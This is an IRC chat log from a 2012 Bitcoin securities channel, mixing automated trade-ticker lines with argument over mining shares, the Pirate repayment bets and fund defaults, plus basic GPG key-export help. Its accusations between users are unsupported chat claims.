[GSDPT] 25 @ 0.0034 = 0.085 BTC [+] Sep 07 06:43:35 [MPEX] [S.MPOE] 5432 @ 0.00041264 = 2.2415 BTC [+] Sep 07 06:43:36 [MPEX] [S.MPOE] 19700 @ 0.00041401 = 8.156 BTC [+] Sep 07 06:43:38 [MPEX] [S.MPOE] 2700 @ 0.00041408 = 1.118 BTC [+] Sep 07 06:51:39 [MPEX] [S.MPOE] 45400 @ 0.00041597 = 18.885 BTC [+] Sep 07 07:02:33 [GLBSE] [FUTUREFUND] 1 @ 0.00012432 BTC [-] Sep 07 07:10:56 [MPEX] [S.MPOE] 16832 @ 0.00041581 = 6.9989 BTC [-] Sep 07 07:12:49 [MPEX] [F.GIGA.ETF] 2937 @ 0.00069 = 2.0265 BTC [-] Sep 07 07:19:27 [MPEX] [F.GIGA.ETF] 814 @ 0.00064789 = 0.5274 BTC [-] Sep 07 07:21:24 [MPEX] [S.MPOE] 9900 @ 0.00041581 = 4.1165 BTC [-] Sep 07 07:22:06 [GLBSE] [ASICMINER] 1 @ 0.12 BTC [-] Sep 07 07:26:21 [GLBSE] [OBSI.HRPT] 1 @ 0.10427 BTC [+] Sep 07 07:34:01 [GLBSE] [BFLS] 1 @ 1 BTC [+] Sep 07 07:34:02 [GLBSE] [BFLS] 4 @ 1 = 4 BTC [+] Sep 07 07:40:52 [GLBSE] [BFLS] 1 @ 1 BTC [+] Sep 07 07:40:53 [GLBSE] [BFLS] 3 @ 1 = 3 BTC [+] Sep 07 07:44:48 [MPEX] [S.MPOE] 3636 @ 0.00041581 = 1.5119 BTC [-] Sep 07 07:46:26 [GLBSE] [BFLS] 1 @ 1 BTC [+] Sep 07 07:47:06 [GLBSE] [OBSI.HRPT] 6 @ 0.10427 = 0.6256 BTC [+] Sep 07 07:56:47 [GLBSE] [BLUECHIP] 10 @ 0.1 = 1 BTC Sep 07 08:01:01 [GLBSE] [GSDPT] 1800 @ 0.0034 = 6.12 BTC [+] Sep 07 08:18:44 ;;bc,24hprc Sep 07 08:18:45 11.00 Sep 07 08:19:23 [MPEX] [S.MPOE] 11364 @ 0.00041277 = 4.6907 BTC [-] Sep 07 08:19:24 [MPEX] [S.MPOE] 10400 @ 0.00041597 = 4.3261 BTC [+] Sep 07 08:19:26 [MPEX] [S.MPOE] 27836 @ 0.00041606 = 11.5814 BTC [+] Sep 07 08:19:30 [GLBSE] [DI.BFLSC.FAIL] 35 @ 0.001 = 0.035 BTC [+] Sep 07 08:26:36 [MPEX] [S.MPOE] 5900 @ 0.00041606 = 2.4548 BTC [+] Sep 07 08:30:53 [GLBSE] [ASICMINER] 41 @ 0.12 = 4.92 BTC [-] Sep 07 08:31:31 [MPEX] [F.GIGA.ETF] 2300 @ 0.00062912 = 1.447 BTC [-] Sep 07 08:34:23 [GLBSE] [PUREMINING] 1 @ 0.0931 BTC [-] Sep 07 08:40:04 and eleven it is. Sep 07 08:40:11 jesus Sep 07 08:40:15 !ticker gigamining Sep 07 08:40:22 [GLBSE:GIGAMINING] [Bid: 0.74011001] [Ask: 0.78] [Spread: 0.03988999] [Last: 0.7401] [24hVol: 315.70240001] [7dAvg: 0.81801764] Sep 07 08:40:31 !ticker f.giga.etf Sep 07 08:40:32 [MPEX:F.GIGA.ETF] 1day: 0.00062912 / 0.00082873 / 0.00087369 (547206 shares, 453.49 BTC), 30day: 0.00062912 / 0.00094388 / 0.00115139 (10507514 shares, 9,917.90 BTC) Sep 07 08:41:08 ;;seen gigavps Sep 07 08:41:09 gigavps was last seen in #bitcoin-assets 1 week, 6 days, 13 hours, 45 minutes, and 39 seconds ago: we'll see what happens Sep 07 08:41:24 right. guy's asset is going to shit he can't be bothered to come by. this looks great. Sep 07 08:43:23 I don't think he care about the price... what does it changes in the end? Sep 07 08:44:24 [GLBSE] [GSDPT] 30 @ 0.00335 = 0.1005 BTC [-] Sep 07 08:44:27 I mean, what would he do? Just come around and say: "No, wait! They're still very good!" Sep 07 08:44:52 All shares are already issued, the the price fluctuates doesn't impact the offer or operations at all. Sep 07 08:45:04 hum Sep 07 08:45:06 People will just price it how they feel it should be priced =/ Sep 07 08:45:14 well... but wtf is going on Sep 07 08:45:22 i have this queasy feeling there's more to this than i know Sep 07 08:45:26 [GLBSE] [GSDPT] 3000 @ 0.0034 = 10.2 BTC [+] Sep 07 08:46:18 The issue is that he offers 100 mhash/share once ASICs come around (at current prices, around 0.75 to buy the share, + 0.25 to upgrade it to new megahash) Sep 07 08:47:19 And you end up with 30% of the hashing you'd get buying the equipment directly. Sep 07 08:47:53 hm Sep 07 08:47:59 People are switching to BTC-Mining or another other BFL purchase offer. Also switching to ASICMINER. Sep 07 08:48:12 !ticker asicminer Sep 07 08:48:16 [GLBSE:ASICMINER] [Bid: 0.117] [Ask: 0.12] [Spread: 0.003] [Last: 0.12] [24hVol: 101.31129] [7dAvg: 0.12160957] Sep 07 08:48:23 that thing also lost a good 30% Sep 07 08:48:36 and 100 btc is a joke for volume anyway. Sep 07 08:49:42 [GLBSE] [GSDPT] 29 @ 0.0034 = 0.0986 BTC [+] Sep 07 08:49:54 Lost? Sep 07 08:50:01 It ipoed at 0.10 Sep 07 08:50:29 was trading at 1.5ish a week ago Sep 07 08:50:29 Most of the stocks on GLBSE ipo fast and then have very low volumes... Sep 07 08:50:32 [GLBSE] [GSDPT] 4 @ 0.0034 = 0.0136 BTC [+] Sep 07 08:50:43 aye, but 1.5 was a bit overkill Sep 07 08:50:44 [MPEX] [S.MPOE] 9800 @ 0.00041552 = 4.0721 BTC [-] Sep 07 08:50:46 [MPEX] [S.MPOE] 27700 @ 0.00041144 = 11.3969 BTC [-] Sep 07 08:50:58 point being : money can't flow from gigamining into asicminer if that later is shedding Sep 07 08:51:25 neither the volume comparison or price evolution supports this theory. Sep 07 08:51:59 i could see money flowing out of glbse period as an explanation, which'd make plenty of sense, except giga.etf is geting beat up even worse on mpex Sep 07 08:53:01 gigamining price is dropping because there's almsot NO bidding Sep 07 08:53:42 ASIC miner had a large sale recently, at least relatively to volume, dropped the price quite a bit. Sep 07 08:54:26 i have some asic, need the coin but dont want to sell... Sep 07 08:54:33 hope it goes to .2 :) Sep 07 08:55:20 If they get ASICs out, they just might... Sep 07 08:55:24 i still think it's a very risky proposition. but yea, if they come out with anything definite it might boom Sep 07 08:55:31 yeah, that. Sep 07 08:57:00 Could you stop using the word turds every other sentence? I'm fully aware of your point of view on the matter by now. Sep 07 08:57:36 I already agree fixed bonds are bad in any case. Sep 07 09:00:59 [GLBSE] [ASICMINER] 27 @ 0.12 = 3.24 BTC [-] Sep 07 09:01:00 [GLBSE] [ASICMINER] 23 @ 0.122 = 2.806 BTC [+] Sep 07 09:01:00 Fixed hashing bonds. I think it's self explanatory enough. Sep 07 09:02:25 [GLBSE] [ASICMINER] 1 @ 0.117 BTC [-] Sep 07 09:02:27 [GLBSE] [ASICMINER] 1 @ 0.11250001 BTC [-] Sep 07 09:03:13 we jixed it. Sep 07 09:03:48 [MPEX] [F.GIGA.ETF] 11600 @ 0.000608 = 7.0528 BTC [-] Sep 07 09:03:50 [MPEX] [F.GIGA.ETF] 2086 @ 0.00062912 = 1.3123 BTC [+] Sep 07 09:03:51 [MPEX] [F.GIGA.ETF] 11314 @ 0.0006348 = 7.1821 BTC [+] Sep 07 09:04:15 [MPEX] [F.GIGA.ETF] 6817 @ 0.0006348 = 4.3274 BTC [+] Sep 07 09:04:16 [MPEX] [F.GIGA.ETF] 3278 @ 0.00065423 = 2.1446 BTC [+] Sep 07 09:04:17 [MPEX] [F.GIGA.ETF] 12219 @ 0.00065956 = 8.0592 BTC [+] Sep 07 09:04:18 [MPEX] [F.GIGA.ETF] 2686 @ 0.00066445 = 1.7847 BTC [+] Sep 07 09:14:43 [MPEX] [S.MPOE] 1452 @ 0.00041144 = 0.5974 BTC [-] Sep 07 09:16:47 !ticker s.dice Sep 07 09:16:49 [MPEX:S.DICE] 1day: 0.003325 / 0.00338316 / 0.0034 (606260 shares, 2,051.08 BTC), 30day: 0.0032 / 0.00328894 / 0.0034 (4143774 shares, 13,628.63 BTC) Sep 07 09:22:07 [GLBSE] [TYGRR.BOND-P] 25 @ 0.101 = 2.525 BTC [-] Sep 07 09:22:08 [GLBSE] [TYGRR.BOND-P] 100 @ 0.1 = 10 BTC [-] Sep 07 09:27:08 [GLBSE] [OBSI.HRPT] 6 @ 0.1039 = 0.6234 BTC [-] Sep 07 09:32:22 [MPEX] [F.GIGA.ETF] 13600 @ 0.0006 = 8.16 BTC [-] Sep 07 09:34:43 [GLBSE] [GSDPT] 180 @ 0.0034 = 0.612 BTC [+] Sep 07 09:36:50 [GLBSE] [TYGRR.BOND-B] 1 @ 0.1 BTC [+] Sep 07 09:37:51 [GLBSE] [PIMP] 1 @ 0.11 BTC [-] Sep 07 09:40:47 [GLBSE] [GSDPT] 64 @ 0.0034 = 0.2176 BTC [+] Sep 07 09:42:07 pimp oh lol Sep 07 09:42:08 what a name Sep 07 09:47:43 [GLBSE] [FPGAMINING] 5 @ 0.824 = 4.12 BTC [+] Sep 07 09:48:28 [GLBSE] [FPGAMINING] 12 @ 0.8244 = 9.8928 BTC [+] Sep 07 10:00:44 [MPEX] [O.BTCUSD.P180T] 1 @ 0.805282 BTC [-] Sep 07 10:00:45 [MPEX] [O.BTCUSD.P070N] 10 @ 0.09229332 = 0.9229 BTC [-] Sep 07 10:05:15 [GLBSE] [NYAN.B] 30 @ 1 = 30 BTC [+] Sep 07 10:12:41 [MPEX] [S.MPOE] 10248 @ 0.00041144 = 4.2164 BTC [-] Sep 07 10:12:42 [MPEX] [S.MPOE] 20252 @ 0.0004112 = 8.3276 BTC [-] Sep 07 10:16:16 [GLBSE] [OBSI.HRPT] 1 @ 0.10428 BTC [+] Sep 07 10:18:16 [MPEX] [S.MPOE] 29800 @ 0.00041157 = 12.2648 BTC [+] Sep 07 10:21:02 Hi, how many hours left for the ax to fall? Sep 07 10:22:04 on matthew? Sep 07 10:22:13 <_matthew_> ☠ Pirate has 1day 12hrs 30mins 53secs to pay back. ☠ Sep 07 10:22:29 [MPEX] [S.MPOE] 30375 @ 0.00041157 = 12.5014 BTC [+] Sep 07 10:22:34 [GLBSE] [GIGAMINING] 1 @ 0.7799 BTC [+] Sep 07 10:22:36 [GLBSE] [GIGAMINING] 6 @ 0.78 = 4.68 BTC [+] Sep 07 10:23:33 [GLBSE] [GIGAMINING] 9 @ 0.782 = 7.038 BTC [+] Sep 07 10:25:02 thank you Chaang-Noi. Sep 07 10:25:49 :) Sep 07 10:25:57 iv got the champagne on ice Sep 07 10:26:12 ;;tslb Sep 07 10:26:14 Time since last block: 6 minutes and 31 seconds **** BEGIN LOGGING AT Fri Sep 7 14:28:52 2012 Sep 07 14:31:48 It's now almost almost 80 000 BTC Sep 07 14:32:18 what is Sep 07 14:33:46 Looks like people see it as easy money :) Sep 07 14:34:25 I have doubts about it being so serious... But I'm seriously sure about Pirate not repaying anyway. Sep 07 14:34:37 So I bet. Sep 07 14:34:39 or this is another big joke on btc crowd Sep 07 14:34:56 how much did you bet BTC-Mining Sep 07 14:35:00 We'll see, I'm quite interested to see the purpose behind this. Sep 07 14:35:09 You don't want to know how much... Sep 07 14:35:21 no idea. Madness? Sep 07 14:35:37 100K ? Sep 07 14:35:47 o, you talking about wright and his bets ? Sep 07 14:35:52 yeah Sep 07 14:36:00 trying to keep track of that is about as futile as keeping track of the us debt. Sep 07 14:36:06 Exactly, 100k (USD). Sep 07 14:36:28 10k BTC actually. Sep 07 14:36:39 :) absurd Sep 07 14:37:10 what happens if pirate returns the coin? Sep 07 14:37:45 I spontaneously combust and recycle myself as fertilizer. Sep 07 14:37:56 good idea Sep 07 14:38:06 are you Namworld? Sep 07 14:38:20 Yes. Sep 07 14:39:24 nice to meet you, I am riX2000 :) Sep 07 14:39:59 who's that ? Sep 07 14:40:04 Seriously? Sep 07 14:40:50 guy who bets 15K that pirate is gone for good with all the bitcoins he stole Sep 07 14:41:03 in escrow ? Sep 07 14:41:28 none of the bets are in escrow mircea_popescu Sep 07 14:41:49 so basically this'd be more irrelevant forum sillyness. Sep 07 14:41:55 yes Sep 07 14:42:37 but now we have nice list of btc addresses and names for future reference Sep 07 14:42:38 well as long as we call it that, cool. Sep 07 14:43:03 no, this is really "serious business" :) Sep 07 14:43:55 It might seem that way, except it was made clear from the start if anyone didn't respect his bet, he'd get the scammer tag. Theymos/Maged went to bet against him. He's well known and going to the bitcoin conference. Sep 07 14:44:14 so... Sep 07 14:44:23 LOOL, this is getting really good: https://bitcointalk.org/index.php?topic=102918.600 Sep 07 14:44:26 it still is just drama, the guy's broke, irl and btc. Sep 07 14:44:27 Seems like yet another thing that will be fun to watch Sep 07 14:44:35 "BTCST wasnt a ponzi it just invested in one Sep 07 14:45:10 "going to the bitcoin conference" why is this even important? Sep 07 14:45:22 [GLBSE] [PUREMINING] 7 @ 0.0931 = 0.6517 BTC [-] Sep 07 14:45:45 Because he has the existential dilemma of accepting your bet and not paying you when he loses, or not accepting your bet and still not paying. Sep 07 14:45:46 lol Sep 07 14:45:52 EB250 it is not important. Sep 07 14:46:11 it basically consists of a dozen or so kids trying to pretend they're entrepreneurs while living under the poverty line Sep 07 14:46:25 like you mircea_popescu? Sep 07 14:46:26 couch surfing in a room somewhere. Sep 07 14:46:31 EB250 no, not like me. Sep 07 14:46:35 quite the opposite of me. Sep 07 14:46:36 hi mircea popescu Sep 07 14:46:41 PAPASO hello Sep 07 14:46:53 I do not know you for long but looks like you have problems with money Sep 07 14:47:14 o it does. Sep 07 14:47:56 people usually talk about stuff they do not have :9 Sep 07 14:48:01 It does matter that he's going to the conference, because there's betters that will be assisting. Sep 07 14:48:26 BTC-Mining yea, and they'll do what ? whine at each other for half hour ? youtube is full of that crap. Sep 07 14:48:31 usually with teenage girls in it. Sep 07 14:49:50 BTC conferences are horrible events. Sep 07 14:50:17 more like nerdfests (not sure about spelling) :) Sep 07 14:50:37 Ah, there goes mircea, criticizing my favorite reality show once again! Sep 07 14:50:53 lol Sep 07 14:50:54 i install pgp4win but i can not open Kleopatra Sep 07 14:51:04 why do you need kleopatra ? Sep 07 14:51:06 "fat teenage girls" Sep 07 14:51:09 correction Sep 07 14:51:14 i dont know Sep 07 14:51:19 no need? Sep 07 14:51:35 sigh. PAPASO, we went through all of this. read the log, please. Sep 07 14:51:38 you just need gpg. Sep 07 14:51:51 ok, thank you Sep 07 14:52:03 I was using Kleopatra to sign faster on the otc instead of using command line mircea... Sep 07 14:52:12 PAPASO: why do you need pgp4win? Sep 07 14:52:20 i am learning gpg Sep 07 14:52:21 The I see there was an IRC plugin to automate that process. Sep 07 14:52:27 Then I* Sep 07 14:52:28 BTC-Mining yeah, once you know what you're doing you can do whatever you want. Sep 07 14:52:41 but if we have a process to get you started you stick to that, improve on it once you master it. Sep 07 14:53:02 mircea_popescu told me to download it boze i need to buy call options Sep 07 14:53:04 there's a py script and a perl script for mpex too, just... Sep 07 14:53:38 PAPASO: why do you need pgp4win? <<< "Trying to be part of a cryptocurrency without knowing how to use gpg is like trying to be part of the 60s without knowing how to use a bong." Sep 07 14:53:39 [GLBSE] [HYDRO.BONDS] 2 @ 1.4501 = 2.9002 BTC [-] Sep 07 14:53:41 [GLBSE] [HYDRO.BONDS] 5 @ 1.45 = 7.25 BTC [-] Sep 07 14:57:11 [MPEX] [O.BTCUSD.P200N] 12400 @ 1.12 = 13888 BTC [+] Sep 07 14:58:53 EB250 are you trolling? lol Sep 07 15:02:21 I do not think so Chaang-Noi Sep 07 15:02:49 no pirate has not contacte me Sep 07 15:02:53 2 words: "trolling" and "ponzy" must be the most overused words Sep 07 15:03:30 OK, thank you for the information. Clock is ticking and nothing :( Sep 07 15:03:37 ponzi. Sep 07 15:03:44 EB250: except we do hve a lot of trolls Sep 07 15:04:02 Diablo-D3 actually i shudder at the thought it's not even the 8th yet. Sep 07 15:04:21 in this case, the definition must be wrong Sep 07 15:04:39 mircea_popescu: why, what happened/ Sep 07 15:04:40 [GLBSE] [TYGRR.BOND-P] 3 @ 0.08343381 = 0.2503 BTC [-] Sep 07 15:04:41 [GLBSE] [TYGRR.BOND-P] 1 @ 0.0834338 BTC [-] Sep 07 15:04:43 [GLBSE] [TYGRR.BOND-P] 2 @ 0.08262082 = 0.1652 BTC [-] Sep 07 15:04:44 [GLBSE] [TYGRR.BOND-P] 1 @ 0.08190254 BTC [-] Sep 07 15:04:45 [GLBSE] [TYGRR.BOND-P] 1 @ 0.08185995 BTC [-] Sep 07 15:04:47 [GLBSE] [TYGRR.BOND-P] 1 @ 0.0818518 BTC [-] Sep 07 15:04:48 [GLBSE] [TYGRR.BOND-P] 1 @ 0.08182398 BTC [-] Sep 07 15:05:19 Diablo-D3 it's the arbitrary date set by the chief forum muppet to not pay imaginary bets he's not made. Sep 07 15:05:35 er... what? Sep 07 15:06:16 yeah... Sep 07 15:06:34 how do you pay imaginary bets you've not made Sep 07 15:06:53 It will go: "Oh, I was on vacation this whole time! Someone must have hacked my account. ATLAS!" Sep 07 15:07:32 Diablo-D3 i don't know. Sep 07 15:08:39 [GLBSE] [MERGEDMINING] 4 @ 0.065 = 0.26 BTC [+] Sep 07 15:08:52 but you can't say some broke dude "made a bet" by saying something on a forum. you need money to make bets. Sep 07 15:08:59 mircea_popescu: everyone gets a giant pillow case filled with drugs, and im always left out Sep 07 15:09:05 you could in principle make a bet by simple statement, if you have any credit. Sep 07 15:09:29 but that doesnt make a bet Sep 07 15:09:33 right. Sep 07 15:11:01 no, Im just confused Sep 07 15:11:09 maybe its too early in the morning, I just got up Sep 07 15:11:16 [MPEX] [S.MPOE] 36000 @ 0.00040716 = 14.6578 BTC [-] Sep 07 15:11:21 [GLBSE] [PUREMINING] 1 @ 0.0931 BTC [-] Sep 07 15:11:23 [GLBSE] [BIB.PIRATE] 100 @ 0.14 = 14 BTC [+] Sep 07 15:11:35 [GLBSE] [FOO.PPPPT] 100 @ 0.15 = 15 BTC [+] Sep 07 15:12:27 you know wright, the guy who took money from bitcoinica to shill it, the guy who took money from jro to shill that crap, the guy who sold people advertising in magazines that don't exist, as well as the magazines themselves ? Sep 07 15:12:44 he's been "making bets" with people about pirate paying (prolly cause pirate threw him 20 btc early on or w/e) Sep 07 15:12:50 mircea_popescu: nope Sep 07 15:12:52 except he's been consistently refusing to use escrow. Sep 07 15:12:57 I havent been paying attention that crap Sep 07 15:12:57 well... so you're way behind. Sep 07 15:13:10 seriously, I think I was like the fifth person who heard of pirate Sep 07 15:13:16 and I said it was a scam Sep 07 15:13:22 so I just sorta turned off the rest ever since Sep 07 15:13:29 when is the bet due Sep 07 15:13:48 mircea_popescu: btw, is wright related to that black dude that failed to extort money out of DMC? Sep 07 15:14:38 Diablo-D3 i have no ideea ?! kakobrekla 9th iirc. Sep 07 15:14:45 [GLBSE] [YABMC] 2 @ 0.1159 = 0.2318 BTC [-] Sep 07 15:14:59 lol highlevelminer Sep 07 15:15:06 yeah that dude Sep 07 15:15:07 he should have a wiki entry or something Sep 07 15:15:16 hi, mircea popescu, do you have msn? Sep 07 15:15:55 papaso nope. Sep 07 15:17:36 secret-key-0EB31D5E.asc should i change ? Sep 07 15:18:01 or save on the desktop Sep 07 15:18:07 man, secret-key means secret key. Sep 07 15:18:13 you need the public key not the secret key. Sep 07 15:18:24 the secret key should be kept SECRET Sep 07 15:18:38 tell mo howto Sep 07 15:19:33 [MPEX] [S.MPOE] 16104 @ 0.00040716 = 6.5569 BTC [-] Sep 07 15:23:56 papaso http://polimedia.us/bitcoin/faq.html#6 read that list, do the steps exactly as described in the exact order. Sep 07 15:24:09 do nothing else and do nothing differently in any respect, but EXACTLY what's there. Sep 07 15:27:09 read diff, you know, my english is not very good Sep 07 15:27:56 secret-key-0EB31D5E.asc this step i try my best Sep 07 15:29:03 i think first finshed PGP is better, then think how to buy option. Sep 07 15:29:13 papaso to extract your public key the command is gpg --armor --output pubkey.txt --export '0EB31D5E' Sep 07 15:29:29 it will create a file called pubkey.txt with your public key in it. Sep 07 15:31:03 consequently, gpg --armor --output dongs.txt will produce a file full of dongs. Sep 07 15:32:01 if you have msn, i will copy my pic, then you will show me step Sep 07 15:32:43 i don't have msn but you don't need msn to show me your pic. you can just upload it to any public service and paste link here. Sep 07 15:33:40 you know any chinese man here? Sep 07 15:34:41 hmm... Sep 07 15:34:44 you might be the only one. Sep 07 15:35:19 ya, isn't this weird ? no chinese people in bitcoin-assets ? they own most of the us by now and yet... Sep 07 15:35:28 in chinese website i can not find good howto to show howto Sep 07 15:36:05 yes they have btc, and they even build i exchange like mtgox Sep 07 15:36:46 but they like mine more then trade Sep 07 15:36:54 aha Sep 07 15:36:59 link to exchange ? Sep 07 15:37:38 they dont understand option,boze in china stock market and china future market there is no options there Sep 07 15:37:45 really ?! Sep 07 15:37:47 only warrents Sep 07 15:37:55 warrants are similar tho Sep 07 15:38:02 in hongkong have options Sep 07 15:38:22 aha Sep 07 15:38:27 are you from hk ? Sep 07 15:38:38 no main land Sep 07 15:39:01 i trade us future option 10 years Sep 07 15:39:15 well... i am planning to have a chinese translation of the faq. Sep 07 15:39:29 gold sliver cotton....... Sep 07 15:39:40 even oj Sep 07 15:39:55 aha Sep 07 15:40:09 i love options Sep 07 15:40:19 me too. Sep 07 15:41:02 i only buy out--price option and not sell Sep 07 15:50:31 papaso: I was told that mircea_popescu exchange server is also hosting porno. Do not be surprised Sep 07 15:51:43 more than just porno Sep 07 15:51:48 activly pimping out girls... Sep 07 15:52:21 and also has about 5x the volume of the global scam exchange the forum muppets keep trying to hawk. Sep 07 15:53:31 [GLBSE] [GSDPT] 500 @ 0.003399 = 1.6995 BTC [-] Sep 07 15:56:31 mircea_popescu: your "volume" is probably from new satoshidice offer and pass troughs to GLBSE :) Sep 07 15:56:49 EB250 you are probably an idiot. Sep 07 15:56:51 !ticker s.dice Sep 07 15:56:53 [MPEX:S.DICE] 1day: 0.003325 / 0.00338316 / 0.0034 (606095 shares, 2,050.52 BTC), 30day: 0.0032 / 0.00328894 / 0.0034 (4143774 shares, 13,628.63 BTC) Sep 07 15:56:55 !ticker gsdpt Sep 07 15:56:59 [GLBSE:GSDPT] [Bid: 0.00314] [Ask: 0.0034] [Spread: 0.00026] [Last: 0.003399] [24hVol: 64.49505] [7dAvg: 0.00327461] Sep 07 15:57:08 o wait, global scam exchange has useless data. Sep 07 15:57:14 calm down Sep 07 15:57:37 .py 13628.63/1827.409 Sep 07 15:57:38 7.45789804034 Sep 07 15:57:41 there. 7.5% Sep 07 15:57:45 is that clear to you ? Sep 07 15:58:03 no Sep 07 15:58:34 mkay. two idiocies in one day are good enough. move along to -otc, this chan is intended for people that actually matter. Sep 07 15:58:38 EB250!*@* added to ignore list. Sep 07 15:58:45 he fakes his volume Sep 07 15:58:55 he moves his own sharesback and forth... Sep 07 15:59:00 Chaang-Noi i thought we went through this before : you do, i don't. Sep 07 15:59:11 i dont have an exchange... Sep 07 15:59:28 [GLBSE] [OBSI.HRPT] 8 @ 0.1039 = 0.8312 BTC [-] Sep 07 15:59:29 no, but you have shitty/scammy assets on the global scam exchange Sep 07 15:59:37 and push them back and forth to create the illusion of volume. Sep 07 15:59:52 that would cost me money Sep 07 16:00:01 no it won't, you get it free. Sep 07 16:00:12 i know all about your little bs circlejerk there, so spare me. Sep 07 16:00:18 lol Sep 07 16:00:32 and when you're done making a fool of yourself, your so called mining operation could still use a fucking pic of the gear. Sep 07 16:00:35 i find it finny how people think nefario and i are best freinds Sep 07 16:00:45 which people have been asking for... i dunno, 6 months by now ? Sep 07 16:00:54 pics of the gear were posted in december Sep 07 16:01:01 you are lols Sep 07 16:01:09 no one has asked for the pics Sep 07 16:01:10 [GLBSE] [OBSI.HRPT] 1 @ 0.1039 BTC [-] Sep 07 16:01:18 you are just making shit up Sep 07 16:01:38 off to smoke one of coldhardmetals cubans Sep 07 16:01:41 peace all Sep 07 16:04:51 [GLBSE] [BTCMC] 8 @ 0.5897 = 4.7176 BTC [+] Sep 07 16:04:53 [GLBSE] [BTCMC] 1 @ 0.5898 BTC [+] Sep 07 16:07:07 [GLBSE] [NYAN] 5 @ 0.99 = 4.95 BTC [-] Sep 07 16:07:27 [GLBSE] [NYAN.B] 3 @ 1 = 3 BTC [+] Sep 07 16:09:04 [GLBSE] [BITSPLIT.MINING.1TH] 3 @ 0.033 = 0.099 BTC Sep 07 16:09:12 [GLBSE] [OBSI.HRPT] 9 @ 0.1039 = 0.9351 BTC [-] Sep 07 16:09:13 [GLBSE] [NYAN.B] 1 @ 1 BTC [+] Sep 07 16:09:18 [GLBSE] [NYAN.C] 4 @ 0.7 = 2.8 BTC [+] Sep 07 16:09:38 [GLBSE] [NYAN.A] 3 @ 1 = 3 BTC [+] Sep 07 16:10:27 [GLBSE] [NYAN] 1 @ 0.99 BTC [-] Sep 07 16:11:53 [GLBSE] [BIF.P2P.LOANS] 5 @ 0.1 = 0.5 BTC Sep 07 16:12:45 [GLBSE] [BDK.BND] 46 @ 0.1 = 4.6 BTC [-] Sep 07 16:13:02 [GLBSE] [BIF.1YR.LOAN] 2 @ 0.98 = 1.96 BTC [-] Sep 07 16:14:08 [MPEX] [S.MPOE] 31801 @ 0.00040599 = 12.9109 BTC [-] Sep 07 16:14:10 [MPEX] [S.MPOE] 2999 @ 0.00040512 = 1.215 BTC [-] Sep 07 16:15:29 Anyone interested in purchasing HK and IMSAguy exposure? I need to get a hold of some BTC quickly, so I don't want to wait for the withdraw process, pm me :) Sep 07 16:21:01 DeaDTerra1 what's hk ? Sep 07 16:22:54 [GLBSE] [YABMC] 1 @ 0.1159 BTC [-] Sep 07 16:31:29 [MPEX] [B.MPCD.B] 12000 @ 0.00100906 = 12.1087 BTC [+] Sep 07 16:31:50 [GLBSE] [BITBOND] 3 @ 0.4223 = 1.2669 BTC [+] Sep 07 16:36:42 HashKing Sep 07 16:37:06 DeaDTerra1 i'll pay you 50 cents to the dollar, limited to 100 btc each. Sep 07 16:42:37 why is hashking delayed? Sep 07 16:43:02 do you mean his ppt or 1% fund Sep 07 16:44:29 1% Sep 07 16:44:45 http://news.yahoo.com/judge-says-10-rare-gold-coins-worth-80-152750965--abc-news-topstories.html Sep 07 16:44:52 govt steals some more gold. Sep 07 16:46:20 deadterra1 any idea why there is a delay with hk? Sep 07 16:46:33 i have a wild guess :/ Sep 07 16:47:04 he was paying out principal up until sep 3 Sep 07 16:51:00 chaang-noi what do u think? Sep 07 16:52:43 his 1% fund is insured...its the ppt i would be worried about Sep 07 16:53:16 Well, the insured thing in bitcoinland... Sep 07 16:53:55 define insured blazing Sep 07 16:56:43 so what makes u think he cant pay out Sep 07 16:57:02 pirate association. Sep 07 16:57:24 Well, it seems he's selling some things Sep 07 16:57:38 Maybe is just a liquidity squeeze Sep 07 16:57:52 hence the 50 cents to the dollar offer. maybe it's just a liquidity squeeze. Sep 07 16:57:54 yeah. well i think hashking is a pretty decent guy...hes obviously doing what he can Sep 07 16:58:08 tho anyone with any sense would have moved preemptively for weeks now. Sep 07 16:58:33 blazing decent is only half the problem in this discussion tho. Sep 07 16:59:02 i have 500btc in his 1% fund...hope i can see it again Sep 07 17:00:14 btc today reminds me of usd in 2007 Sep 07 17:01:26 anyway...its just speculation...i have received interest from him twice since the pirate default so there is still hope Sep 07 17:02:13 in the end, people will have to book something like 6-700k of losses/unrealised gains. Sep 07 17:02:25 moo Sep 07 17:02:38 which obviously i said they should have been booked by late august, and obviously everyone said they did so, and obviously nobody did. and so forth. Sep 07 17:03:09 [GLBSE] [OBSI.HRPT] 1 @ 0.10399 BTC [+] Sep 07 17:06:12 for my insrurance i used coin that was shown in the block chain Sep 07 17:06:25 i dont know who can or will pay out Sep 07 17:06:33 but im watching with interest Sep 07 17:07:07 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 07 17:07:14 i guess pretty much everyone is. Sep 07 17:07:27 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 07 17:07:48 [GLBSE] [GSDPT] 5 @ 0.0034 = 0.017 BTC [+] Sep 07 17:07:59 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 07 17:14:32 which funds cant actually pay out right now Sep 07 17:15:41 i guess hashking and imsaguy but maybe others Sep 07 17:16:08 did hashking actually say he cant pay out Sep 07 17:17:20 why does that matter blazing ? Sep 07 17:18:05 sorry im just a bit worried Sep 07 17:18:22 what a mess Sep 07 17:19:02 [MPEX] [S.MPOE] 12400 @ 0.00040601 = 5.0345 BTC [+] Sep 07 17:20:25 ya well, it's what happens when people give a lot of money to ponzi scammers. Sep 07 17:20:31 the economy gets a little shocked. Sep 07 17:20:33 [MPEX] [S.MPOE] 4300 @ 0.00040512 = 1.742 BTC [-] Sep 07 17:21:22 yeah do u think he will try to pay back his lenders Sep 07 17:21:40 what ponzi scheme Sep 07 17:21:40 tell me Sep 07 17:21:43 so i can put my mone yin it Sep 07 17:21:48 iv not heard hashking would not pay or could not pay, i just no someone who wants out but cant at this time. Sep 07 17:21:55 i dont know the details and it might be bs Sep 07 17:22:41 well people have received their interest and principal from him for the 1% fund prior to sep 4 so it cant be too bad Sep 07 17:23:00 ok Sep 07 17:23:31 chaang-noi how r u handling things...must be pretty rough Sep 07 17:23:48 shit sucks but i can cover all my debts Sep 07 17:24:17 i will have to be in debt in the real world Sep 07 17:24:36 now i has need a job, my savings are pretty much gone Sep 07 17:26:24 [GLBSE] [MMM] 1 @ 0.91 BTC [-] Sep 07 17:28:42 [GLBSE] [OBSI.HRPT] 1 @ 0.10399 BTC [+] Sep 07 17:33:35 chaang: you shoulda setup your own ponzi Sep 07 17:33:54 i thought about doing one, but making it clear it was a ponzi Sep 07 17:36:31 What happened to the one INAU started? Sep 07 17:36:36 Anybody 